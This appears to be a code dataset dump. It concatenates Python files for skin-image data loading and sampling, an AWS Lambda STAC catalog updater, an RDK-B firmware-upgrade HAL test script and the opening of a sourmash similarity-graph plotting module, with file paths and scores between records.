self.length = len(dataset.imgfiles)
def __len__(self):
return self.length
def __iter__(self):
indices = []
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
indices += list(np.random.choice(np.where(self.labels != self.pos_label)[0], sample_neg, replace=self.num_neg<sample_neg))
indices = np.random.permutation(indices)
return iter(indices.tolist())
class BenignSampler(Sampler):
def __init__(self, dataset, probas=None, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.dataset = dataset # store
self.labels = np.asarray(dataset.labels)
self.imgfiles = np.asarray(dataset.imgfiles)
self.pos_label = pos_label
# Need to map image file to indices
self.img2index = {i : index for index, i in enumerate(self.imgfiles)}
self.negfiles = [im for i, im in enumerate(self.imgfiles) if self.labels[i] != pos_label]
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
self.length = self.num_pos * 4
if type(probas) == type(None):
# Assign equal weight to all benigns
p = 1.0 / len(self.negfiles)
probas = {i : p for i in self.negfiles}
self.probas = probas
def __len__(self):
return self.length
def __iter__(self):
indices = []
probas = {self.img2index[k] : v for k,v in self.probas.items()}
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
# For negatives, sample based on weight
keys = [*probas]
values = np.asarray([probas[k] for k in keys])
indices += list(np.random.choice(keys, sample_neg, replace=sample_neg>len(keys), p=values))
indices = np.random.permutation(indices)
return iter(indices.tolist()) | src/factory/data/datasets.py | import torch
import torch.nn as nn
import torch.nn.functional as F
import pydicom
import numpy as np
import cv2
import re
import glob
import os, os.path as osp
from PIL import Image
from torch.utils.data import Dataset, Sampler
from .utils import _isnone
from .crop_tta import crop_tta, resize_for_crop
import numpy as np
def square_crop(img, random=True):
h, w = img.shape[:2]
if h == w: return img
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
if random:
offset = np.abs(h-w)
offset = np.random.randint(-offset, offset)
if short_side:
xc += offset//2
else:
yc += offset//2
x1, y1 = xc-s//2, yc-s//2
x1, y1 = max(0,x1), max(0,y1)
img_crop = img[x1:x1+s, y1:y1+s]
if img_crop.shape[0] != img_crop.shape[1]:
print(f'Shape is {img_crop.shape}')
return img
return img_crop
def generate_crops(img, num_crops=10):
h, w = img.shape[:2]
if h == w: return [img]
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
offset = np.abs(h-w)
offsets = np.unique(np.linspace(-offset+1, offset-1, num_crops).astype('int'))
crops = []
for off in offsets:
if short_side:
new_xc = xc-off//2
x1, y1 = new_xc-s//2, yc-s//2
else:
new_yc = yc-off//2
x1, y1 = xc-s//2, new_yc-s//2
x1, y1 = max(0,x1), max(0,y1)
crops += [img[x1:x1+s, y1:y1+s]]
if crops[-1].shape[0] != crops[-1].shape[1]:
print(f'Shape is {crops[-1].shape}')
print(img.shape)
print(x1, y1, s)
crops[-1] = img
return crops
class SkinDataset(Dataset):
def __init__(self,
imgfiles,
labels,
meta=None,
square=False,
square_tta=None,
crop_tta=None,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False,
jsd=False,
onehot=False):
self.imgfiles = imgfiles
self.labels = labels
self.meta = meta
self.square = square
self.square_tta = square_tta
self.crop_tta = crop_tta
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
if self.crop:
self.crop_size = (self.crop.transforms[0].height, self.crop.transforms[0].width)
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.jsd = jsd
self.onehot = onehot
def process_image(self, X, jsd=False):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform and not jsd: X = self.transform(image=X)['image']
if self.crop and not self.test_mode:
X = resize_for_crop(X, crop_size=self.crop_size)
X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def get(self, i):
try:
X = cv2.imread(self.imgfiles[i])
if _isnone(X):
X = cv2.imread(self.imgfiles[i].replace('jpg','png'))
if _isnone(X):
return None
if not _isnone(self.meta):
X = {'img': X}
X.update(self.meta[i])
return X
except Exception as e:
if self.verbose: print(e)
return None
@staticmethod
def flip_array(X, mode):
if mode == 0:
X = X[:,::-1]
elif mode == 1:
X = X[:,:,::-1]
elif mode == 2:
X = X[:,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.transpose(0,2,1)
X = np.ascontiguousarray(X)
return X
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode and self.square_tta:
if isinstance(X, dict):
X['img'] = generate_crops(X['img'], num_crops=self.square_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = generate_crops(X, num_crops=self.square_tta)
X = np.asarray([self.process_image(_) for _ in X])
elif self.test_mode and self.crop_tta:
if isinstance(X, dict):
X['img'] = crop_tta(X['img'], crop_size=self.crop_size, num_crops=self.crop_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = crop_tta(X, crop_size=self.crop_size, num_crops=self.crop_tta)
X = np.asarray([self.process_image(_) for _ in X])
else:
if isinstance(X, dict):
if self.square: X['img'] = square_crop(X['img'], random=not self.test_mode)
if self.jsd: raise Exception('JSD not supported when using metadata')
X['img'] = self.process_image(X['img'])
else:
if self.square: X = square_crop(X, random=not self.test_mode)
if self.jsd and not self.test_mode: X_orig = X.copy()
X = self.process_image(X)
if self.jsd and not self.test_mode:
# Additional aug
X_aug = self.process_image(X_orig)
X_orig = self.process_image(X_orig, jsd=True)
if self.onehot and not self.test_mode:
onehot_y = {
0: [1.,0.,0.],
1: [0.,1.,0.],
2: [0.,0.,1.]
}
y = self.labels[i]
if isinstance(y, str):
y = y.split(',')
y = [float(_) for _ in y]
else:
y = onehot_y[int(y)]
if len(y) == 1:
y = onehot_y[int(y[0])]
else:
y = self.labels[i]
if isinstance(y, str):
y = float(y)
if self.flip and not self.test_mode:
# X.shape = (C, H, W)
mode = np.random.randint(5)
if isinstance(X, dict):
X['img'] = self.flip_array(X['img'], mode)
else:
X = self.flip_array(X, mode)
if self.jsd and not self.test_mode:
X_aug = self.flip_array(X_aug, mode)
X_orig = self.flip_array(X_orig, mode)
if isinstance(X, dict):
X = {k: torch.tensor(v) for k,v in X.items()}
else:
X = torch.tensor(X)
if self.jsd and not self.test_mode:
X = (torch.tensor(X_orig), torch.tensor(X), torch.tensor(X_aug))
y = torch.tensor(y)
return X, y
class SiameseDataset(Dataset):
def __init__(self,
imgfiles,
labels,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False):
self.imgfiles = imgfiles
self.labels = labels
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.posfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 1]
self.negfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 0]
self.get = self.get_test if self.test_mode else self.get_train
def process_image(self, X):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform: X = self.transform(image=X)['image']
if self.crop: X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def _read_image(self, fp):
X = cv2.imread(fp)
if _isnone(X):
X = cv2.imread(fp.replace('jpg','png'))
return X
def get_test(self, i):
try:
return self._read_image(self.imgfiles[i])
except Exception as e:
if self.verbose: print(e)
return None
def get_train(self, i):
try:
pair_type = np.random.randint(4)
if pair_type <= 1:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
elif pair_type == 2:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.posfiles))
elif pair_type == 3:
X1 = self._read_image(np.random.choice(self.negfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
return [X1, X2], pair_type
except Exception as e:
if self.verbose: print(e)
return None
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode:
X = self.process_image(X)
y = self.labels[i]
else:
X, pair_type = X
X = np.asarray([self.process_image(_) for _ in X])
if pair_type <= 1:
y = 0 # different
else:
y = 1 # same
if self.flip and not self.test_mode:
# X.shape = (2, C, H, W)
mode = np.random.randint(5)
if mode == 0:
X = X[...,::-1]
elif mode == 1:
X = X[...,::-1,:]
elif mode == 2:
X = X[...,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.swapaxes(-1, -2)
X = np.ascontiguousarray(X)
X = torch.tensor(X)
y = torch.tensor(y)
return X, y
class Upsampler(Sampler):
def __init__(self, dataset, upsample_factor=25):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.num_pos = np.sum(self.labels >= 0.5)
self.num_neg = np.sum(self.labels < 0.5)
self.upsample_factor = upsample_factor
self.length = self.num_neg + upsample_factor * self.num_pos
def __len__(self):
return self.length
def __iter__(self):
indices = []
indices += list(np.where(self.labels < 0.5)[0])
indices += list(np.random.choice(np.where(self.labels >= 0.5)[0], self.upsample_factor * self.num_pos, replace=True))
indices = np.random.permutation(indices)
return iter(indices.tolist())
class BalancedSampler(Sampler):
def __init__(self, dataset, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.pos_label = pos_label
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
self.length = len(dataset.imgfiles)
def __len__(self):
return self.length
def __iter__(self):
indices = []
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
indices += list(np.random.choice(np.where(self.labels != self.pos_label)[0], sample_neg, replace=self.num_neg<sample_neg))
indices = np.random.permutation(indices)
return iter(indices.tolist())
class BenignSampler(Sampler):
def __init__(self, dataset, probas=None, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.dataset = dataset # store
self.labels = np.asarray(dataset.labels)
self.imgfiles = np.asarray(dataset.imgfiles)
self.pos_label = pos_label
# Need to map image file to indices
self.img2index = {i : index for index, i in enumerate(self.imgfiles)}
self.negfiles = [im for i, im in enumerate(self.imgfiles) if self.labels[i] != pos_label]
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
self.length = self.num_pos * 4
if type(probas) == type(None):
# Assign equal weight to all benigns
p = 1.0 / len(self.negfiles)
probas = {i : p for i in self.negfiles}
self.probas = probas
def __len__(self):
return self.length
def __iter__(self):
indices = []
probas = {self.img2index[k] : v for k,v in self.probas.items()}
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
# For negatives, sample based on weight
keys = [*probas]
values = np.asarray([probas[k] for k in keys])
indices += list(np.random.choice(keys, sample_neg, replace=sample_neg>len(keys), p=values))
indices = np.random.permutation(indices)
return iter(indices.tolist()) | 0.393152 | 0.282295 |
import os
import json
import base64
import gzip
import boto3
from satstac import Collection, Item
from stac_updater import utils
sns_client = boto3.client('sns')
s3_res = boto3.resource('s3')
ACCOUNT_ID = boto3.client('sts').get_caller_identity()['Account']
REGION = os.getenv('REGION')
NOTIFICATION_TOPIC = os.getenv('NOTIFICATION_TOPIC')
def kickoff(event, context):
event_source = os.getenv('EVENT_SOURCE')
# Load payload based on event source
if event_source == "s3":
bucket = event['Records'][0]['s3']['bucket']['name']
key = event['Records'][0]['s3']['object']['key']
content_object = s3_res.Object(bucket, key)
file_content = content_object.get()['Body'].read().decode('utf-8')
payload = json.loads(file_content)
elif event_source == "sns":
payload = json.loads(event['Records'][0]['Sns']['Message'])
else:
# Default is lambda
payload = event
print(payload)
try:
coll_name = payload['properties']['collection']
except KeyError:
coll_name = payload['collection']
sns_client.publish(
TopicArn=f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:newStacItemTopic",
Message=json.dumps(payload),
MessageAttributes={
'collection': {
'DataType': 'String',
'StringValue': coll_name
}
}
)
def update_collection(event, context):
collection_root = os.getenv('COLLECTION_ROOT')
path = os.getenv('PATH')
filename = os.getenv('FILENAME')
item_count = len(event['Records'])
stac_links = []
for record in event['Records']:
stac_item = json.loads(record['body'])
print(stac_item)
col = Collection.open(collection_root)
collection_name = col.id
kwargs = {'item': Item(stac_item)}
if path:
kwargs.update({'path': '$' + '/$'.join(path.split('/'))})
if filename:
kwargs.update({'filename': '$' + '/$'.join(filename.split('/'))})
print(kwargs)
col.add_item(**kwargs)
col.save()
stac_links.append(kwargs['item'].links('self')[0])
# Send message to SNS Topic if enabled
if NOTIFICATION_TOPIC:
kwargs = utils.stac_to_sns(kwargs['item'].data)
kwargs.update({
'TopicArn': f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:{NOTIFICATION_TOPIC}"
})
sns_client.publish(**kwargs)
print(f"LOGS CollectionName: {collection_name}\tItemCount: {item_count}\tItemLinks: {stac_links}")
def es_log_ingest(event, context):
from stac_updater import logging
cw_data = event['awslogs']['data']
compressed_payload = base64.b64decode(cw_data)
uncompressed_payload = gzip.decompress(compressed_payload)
payload = json.loads(uncompressed_payload)
# Index to ES
logging.index_logs(payload) | stac_updater/handler.py | import os
import json
import base64
import gzip
import boto3
from satstac import Collection, Item
from stac_updater import utils
sns_client = boto3.client('sns')
s3_res = boto3.resource('s3')
ACCOUNT_ID = boto3.client('sts').get_caller_identity()['Account']
REGION = os.getenv('REGION')
NOTIFICATION_TOPIC = os.getenv('NOTIFICATION_TOPIC')
def kickoff(event, context):
event_source = os.getenv('EVENT_SOURCE')
# Load payload based on event source
if event_source == "s3":
bucket = event['Records'][0]['s3']['bucket']['name']
key = event['Records'][0]['s3']['object']['key']
content_object = s3_res.Object(bucket, key)
file_content = content_object.get()['Body'].read().decode('utf-8')
payload = json.loads(file_content)
elif event_source == "sns":
payload = json.loads(event['Records'][0]['Sns']['Message'])
else:
# Default is lambda
payload = event
print(payload)
try:
coll_name = payload['properties']['collection']
except KeyError:
coll_name = payload['collection']
sns_client.publish(
TopicArn=f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:newStacItemTopic",
Message=json.dumps(payload),
MessageAttributes={
'collection': {
'DataType': 'String',
'StringValue': coll_name
}
}
)
def update_collection(event, context):
collection_root = os.getenv('COLLECTION_ROOT')
path = os.getenv('PATH')
filename = os.getenv('FILENAME')
item_count = len(event['Records'])
stac_links = []
for record in event['Records']:
stac_item = json.loads(record['body'])
print(stac_item)
col = Collection.open(collection_root)
collection_name = col.id
kwargs = {'item': Item(stac_item)}
if path:
kwargs.update({'path': '$' + '/$'.join(path.split('/'))})
if filename:
kwargs.update({'filename': '$' + '/$'.join(filename.split('/'))})
print(kwargs)
col.add_item(**kwargs)
col.save()
stac_links.append(kwargs['item'].links('self')[0])
# Send message to SNS Topic if enabled
if NOTIFICATION_TOPIC:
kwargs = utils.stac_to_sns(kwargs['item'].data)
kwargs.update({
'TopicArn': f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:{NOTIFICATION_TOPIC}"
})
sns_client.publish(**kwargs)
print(f"LOGS CollectionName: {collection_name}\tItemCount: {item_count}\tItemLinks: {stac_links}")
def es_log_ingest(event, context):
from stac_updater import logging
cw_data = event['awslogs']['data']
compressed_payload = base64.b64decode(cw_data)
uncompressed_payload = gzip.decompress(compressed_payload)
payload = json.loads(uncompressed_payload)
# Index to ES
logging.index_logs(payload) | 0.222278 | 0.047162 |
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
from FWUpgradeUtility import *
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("fwupgradehal","1");
obj1 = tdklib.TDKScriptingLibrary("sysutil","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
obj1.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
loadmodulestatus1 =obj1.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %loadmodulestatus1 ;
if "SUCCESS" in loadmodulestatus.upper() and "SUCCESS" in loadmodulestatus1.upper():
obj.setLoadModuleStatus("SUCCESS");
obj1.setLoadModuleStatus("SUCCESS");
expectedresult = "SUCCESS";
tdkTestObj, actualresult, FirmwareFilename = get_FirmwareFilename(obj1);
if (expectedresult in actualresult) and (FirmwareFilename != " "):
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Set_Download_Url");
tdkTestObj.addParameter("URL",FirmwareLocationURL);
tdkTestObj.addParameter("filename",FirmwareFilename);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Get_Download_Url");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
url=details.split(" ")[2]
url = url[:-1]
fwName=details.split(" ")[5]
if url == FirmwareLocationURL and fwName == FirmwareFilename:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are not the same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are not fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
print "[TEST EXECUTION RESULT] : FAILURE";
obj.unloadModule("fwupgradehal");
obj1.unloadModule("sysutil");
else:
print "Failed to load the module";
obj.setLoadModuleStatus("FAILURE");
obj1.setLoadModuleStatus("FAILURE");
print "Module loading failed"; | testscripts/RDKB/component/FWUpgradeHAL/TS_FWUPGRADEHAL_SetDownloadUrl.py | # use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
from FWUpgradeUtility import *
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("fwupgradehal","1");
obj1 = tdklib.TDKScriptingLibrary("sysutil","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
obj1.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
loadmodulestatus1 =obj1.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %loadmodulestatus1 ;
if "SUCCESS" in loadmodulestatus.upper() and "SUCCESS" in loadmodulestatus1.upper():
obj.setLoadModuleStatus("SUCCESS");
obj1.setLoadModuleStatus("SUCCESS");
expectedresult = "SUCCESS";
tdkTestObj, actualresult, FirmwareFilename = get_FirmwareFilename(obj1);
if (expectedresult in actualresult) and (FirmwareFilename != " "):
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Set_Download_Url");
tdkTestObj.addParameter("URL",FirmwareLocationURL);
tdkTestObj.addParameter("filename",FirmwareFilename);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Get_Download_Url");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
url=details.split(" ")[2]
url = url[:-1]
fwName=details.split(" ")[5]
if url == FirmwareLocationURL and fwName == FirmwareFilename:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are not the same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are not fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
print "[TEST EXECUTION RESULT] : FAILURE";
obj.unloadModule("fwupgradehal");
obj1.unloadModule("sysutil");
else:
print "Failed to load the module";
obj.setLoadModuleStatus("FAILURE");
obj1.setLoadModuleStatus("FAILURE");
print "Module loading failed"; | 0.327668 | 0.252695 |
import itertools
import warnings
# 3rd-party modules
import holoviews as hv
from holoviews import opts, dim
from holoviews.operation.datashader import datashade, bundle_graph
import networkx as nx
import pandas as pd
# My handwritten modules
from .s3_utils import savefig
from . import knn
from . import sourmash_utils
# don't warn me about too many figures open
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
KSIZES = 9, 12, 15, 21
LOG2SKETCHSIZES = 10, 12, 14, 16
MOLECULES = 'dna', 'protein'
COLOR_COLS = ['species', 'cell_label', ]
PALETTES = dict(species='Set2', cell_label='tab20')
SKETCH_ID_TEMPLATE = 'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
N_NEIGHBORS = 5
def build_graph_and_plot(data, metadata, n_neighbors, color_cols, palettes,
figure_folder, figure_prefix, title):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
graph = knn.nearest_neighbor_graph(data, metadata,
n_neighbors=n_neighbors,
color_cols=color_cols,
palettes=palettes)
pos = nx.spring_layout(graph, seed=0)
for label in color_cols:
fig, ax = plt.subplots()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
knn.draw_graph(graph, edge_color='black', label_col=label, pos=pos)
ax.set_title(title)
figure_suffix = f'graph_nneighbors-{n_neighbors}_colorby-{label}'
png = f'{figure_folder}/{figure_prefix}_{figure_suffix}.png'
savefig(fig, png, dpi=150)
return graph, pos
def get_similarity_graphs(csv_template, metadata, figure_folder,
groupby='species', ksizes=KSIZES,
log2sketchsizes=LOG2SKETCHSIZES, molecules=MOLECULES,
sketch_id_template=SKETCH_ID_TEMPLATE,
n_neighbors=N_NEIGHBORS, plaidplot=False,
palettes=PALETTES, color_cols=COLOR_COLS,
verbose=False, make_within_groupby_graphs=False):
"""Read similarity csvs and create holoviews graphs
Parameters
----------
csv_template : str
format-string to insert molecule, ksize, and log2sketchsize values
into to get csv. e.g.:
'similarities_molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}.csv'
metadata : pandas.DataFrame
Sample-by-feature metadata encoding additional information about
samples, such as species, cell type label, or tissue
groupby : str
Which column of the metadata to groupby to get sub-graphs for
ksizes : tuple of int
Which k-mer sizes to look for similarity files for,
default (9, 12, 15, 21)
log2sketchsizes : tuple of int
Which log2 sketch sizes to look for similarity files for,
default (10, 12, 14, 16)
molecules : tuple of str
Which molecules to use, default both 'dna' and 'protein'
sketch_id_template : str
String to use as a unique identifier for the sketch, e.g.
'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
plaidplot : bool
If true, make a clustered heatmap with the sides labeled with the
color_cols
palettes : dict
Column name (must be in 'metadata') to palette name mapping
color_cols : list
Column names in 'metadata' to color by
Returns
